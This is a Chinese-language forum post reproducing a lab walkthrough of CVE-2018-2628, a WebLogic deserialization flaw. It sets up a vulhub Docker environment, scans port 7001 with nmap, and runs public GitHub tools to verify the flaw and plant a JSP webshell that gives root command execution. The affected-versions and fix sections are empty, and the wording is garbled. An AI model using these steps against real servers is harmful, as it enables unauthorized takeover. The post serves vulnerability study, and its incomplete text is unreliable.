ToB企服应用市场:ToB评测及商务社交产业平台

标题: Weblogic WLS Core Components 反序列化命令执行毛病(CVE-2018-2628) [打印本页]

作者: 西河刘卡车医    时间: 2024-6-11 12:27
标题: Weblogic WLS Core Components 反序列化命令执行毛病(CVE-2018-2628)
1 毛病概述

CVE-2018-2628 是 Oracle WebLogic Server(WLS)核心组件中的一个反序列化命令执行毛病。此毛病答应未授权的用户通过 T3 协议在远程服务器上执行恣意命令,从而大概完全控制受影响的服务器。
2 影响版本

该毛病影响了以下版本的 Oracle WebLogic Server:

3 毛病原理

此毛病重要利用了两个技能点:Java 反射机制和 RMI(Remote Method Invocation,远程方法调用)。
攻击者可以通过发送精心构造的 T3 协议数据,绕过 WebLogic 的黑名单限制,利用 Java 反射机制和 RMI 的毛病,在目标服务器上执行恣意命令。
4 毛病部署

  1. 进入目录
  2. cd vulhub/weblogic/CVE-2018-2628
  3. 漏洞环境部署
  4. docker-compose up -d
  5. 查看端口
  6. docker-compose ps
复制代码

访问 ,您将看到页面,表现环境正在成功运行。

5 毛病复现

5.1 毛病验证

工具地点:GitHub - Lighird/CVE-2018-2628: CVE-2018-2628毛病工具包
我们将工具包放到kali中解压即可

我们可以先用nmap来检测一下目标的服务是否开启
  1. nmap -n -v -p7001,7002 192.168.135.132 --script=weblogic-t3-info
复制代码

这里可以看到目标开启了7001端口,t3服务开启
确认开启我们可以使用检测工具来检测目标,首先利用
这个工具来检测,cd到目录下,将目标地点填入url.txt中即可

然后我们启动python文件
  1. python2 CVE-2018-2628-MultiThreading.py
复制代码

我们可以看到成功,证明发出的payload成功,毛病可以利用。
5.2 毛病利用

这里我们使用工具:GitHub - jas502n/CVE-2018-2628: Weblogic 反序列化毛病(CVE-2018-2628)
输入命令:
  1. python CVE-2018-2628-Getshell.py 192.168.135.132 7001 shell1.jsp
复制代码

这里就是shell的地点,复制之后打开就好了


我们可以看到是root权限了
这里我们需要执行什么命令将命令base64编码即可
好比我这里是ifconfig,将编码的接到=号背面即可

结果

6 毛病修复建议

参考文章
Weblogic WLS Core Components 反序列化命令执行毛病(CVE-2018-2628)-腾讯云开辟者社区-腾讯云

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4